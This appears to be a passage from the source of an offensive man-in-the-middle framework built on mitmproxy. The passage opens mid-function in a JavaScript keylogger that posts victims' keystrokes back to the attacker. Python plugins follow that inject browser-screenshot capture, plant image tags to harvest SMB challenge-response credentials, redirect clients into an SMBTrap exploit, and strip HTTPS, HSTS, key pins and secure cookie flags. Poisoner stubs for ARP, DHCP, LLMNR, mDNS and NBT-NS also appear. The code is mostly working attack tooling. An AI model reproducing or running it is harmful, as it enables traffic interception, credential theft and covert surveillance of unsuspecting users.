srcname = e.target.name
}
}
var3 = (e) ? e.keyCode : e.which;
if (var3 == 9 || var3 == 8 || var3 == 13)
{
andxhr(var3.toString(16), srcname);
}
else if (var3 == 0)
{
text = document.getElementById(id).value;
if (text.length != 0)
{
andxhr(text.toString(16), srcname);
}
}
}
function andxhr(key, inputName)
{
if (inputName != name)
{
name = inputName;
var2 = ",";
}
var2= var2 + key + ",";
xhr.open("POST", "keylog", true);
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xhr.send(var2 + '&&' + inputName);
if (key == 13 || var2.length > 3000)
{
var2 = ",";
}
}

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import re
from base64 import b64decode
from urllib import unquote
from datetime import datetime
from plugins.plugin import Plugin
from plugins.inject import Inject
class ScreenShotter(Plugin):
name = 'ScreenShotter'
optname = 'screen'
desc = 'Uses HTML5 Canvas to render an accurate screenshot of a clients browser'
version = '0.2'
def initialize(self, context):
payload = open('plugins/resources/screenshot.js', 'r').read()
payload = re.sub('SECONDS_GO_HERE', str(context.interval*1000), payload)
context.js_payload = payload
def request(self, context, flow):
if flow.request.method == 'POST' and ('saveshot' in flow.request.path):
context.handle_post_output = True
img_file = '{}-{}-{}.png'.format(flow.client_conn.address.host, flow.request.host, datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s"))
try:
with open('./logs/' + img_file, 'wb') as img:
img.write(b64decode(unquote(flow.request.content).decode('utf8').split(',')[1]))
img.close()
context.log('[ScreenShotter] Saved screenshot to {}'.format(img_file))
except Exception as e:
context.log('[ScreenShotter] Error saving screenshot: {}'.format(e))
def response(self, context, flow):
Inject().response(context, flow)
def options(self, options):
options.add_argument("--interval", dest="interval", type=int, metavar="SECONDS", default=10, help="Interval at which screenshots will be taken (default 10 seconds)")

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from plugins.plugin import Plugin
from plugins.inject import Inject
class SMBAuth(Plugin):
name = 'SMBAuth'
optname = 'smbauth'
desc = "Evoke SMB challenge-response auth attempts"
version = '0.1'
def initialize(self, context):
context.html_payload = '<img src=\"\\\\{}\\image.jpg\">'\
'<img src=\"file://///{}\\image.jpg\">'\
'<img src=\"moz-icon:file:///%%5c/{}\\image.jpg\">'.format(*tuple([context.ip]*3))
def response(self, context, flow):
Inject().response(context, flow)

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import random
import string
from libmproxy.protocol.http import HTTPResponse
from plugins.plugin import Plugin
from netlib.odict import ODictCaseless
class SMBTrap(Plugin):
name = 'SMBTrap'
optname = 'smbtrap'
desc = "Exploits the SMBTrap vulnerability on connected clients"
version = "1.0"
def request(self, context, flow):
rand_name = ''.join(random.sample(string.ascii_lowercase + string.ascii_uppercase, 10))
resp = HTTPResponse(
[1, 1], 302, "OK",
ODictCaseless([["Location", "file://{}/{}".format(context.ip, rand_name)]]),
"Trapped!")
context.log("[SMBTrap] Trapped request to: {}".format(flow.request.host))
flow.reply(resp)

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import re
from plugins.plugin import Plugin
from netlib.http import decoded
from six.moves import urllib
class SSLStrip(Plugin):
name = 'SSLStrip'
optname = 'sslstrip'
desc = 'Performs SSLStripping attacks on requested pages'
version = '1.0'
def initialize(self, context):
#set of SSL/TLS capable hosts
context.secure_hosts = set()
def request(self, context, flow):
flow.request.headers.pop('If-Modified-Since', None)
flow.request.headers.pop('Cache-Control', None)
#proxy connections to SSL-enabled hosts
if flow.request.pretty_host in context.secure_hosts :
flow.request.scheme = 'https'
flow.request.port = 443
def response(self, context, flow):
with decoded(flow.response) :
flow.request.headers.pop('Strict-Transport-Security', None)
flow.request.headers.pop('Public-Key-Pins', None)
#strip links in response body
flow.response.content = flow.response.content.replace('https://', 'http://')
#strip links in 'Location' header
if flow.response.headers.get('Location','').startswith('https://'):
location = flow.response.headers['Location']
hostname = urllib.parse.urlparse(location).hostname
if hostname:
context.secure_hosts.add(hostname)
flow.response.headers['Location'] = location.replace('https://', 'http://', 1)
#strip secure flag from 'Set-Cookie' headers
cookies = flow.response.headers.get_all('Set-Cookie')
cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies]
flow.response.headers.set_all('Set-Cookie', cookies)

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plugins/upsidedownternet.py Normal file
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import cStringIO
from PIL import Image
from libmproxy.models import decoded
from plugins.plugin import Plugin
class Upsidedownternet(Plugin):
name = 'Upsidedownternet'
optname = 'upsidedownternet'
desc = 'Flips images 180 degrees'
version = '1.0'
def response(self, context, flow):
if flow.response.headers.get("content-type", "").startswith("image"):
with decoded(flow.response): # automatically decode gzipped responses.
try:
s = cStringIO.StringIO(flow.response.content)
img = Image.open(s).rotate(180)
s2 = cStringIO.StringIO()
img.save(s2, "png")
flow.response.content = s2.getvalue()
flow.response.headers["content-type"] = "image/png"
except: # Unknown image types etc.
pass

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poisoners/__init__.py Normal file
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import os
import glob
__all__ = [os.path.basename(f)[:-3] for f in glob.glob(os.path.dirname(__file__)+"/*.py")]

0
poisoners/arp.py Normal file
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poisoners/dhcp.py Normal file
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poisoners/llmnr.py Normal file
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poisoners/mdns.py Normal file
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poisoners/nbtns.py Normal file
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poisoners/poisoner.py Normal file
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import threading
class Poisoner(object):
name = 'Example Poisoner'
optname = 'arp'
def poison(self):
pass
def start(self):
t = threading.Thread(name=self.name, target=self.poison, args=())
t.setDaemon(True)
t.start()

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requirements.txt Normal file
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git+git://github.com/mitmproxy/mitmproxy
git+git://github.com/kti/python-netfilterqueue
user-agents
beautifulsoup4
scapy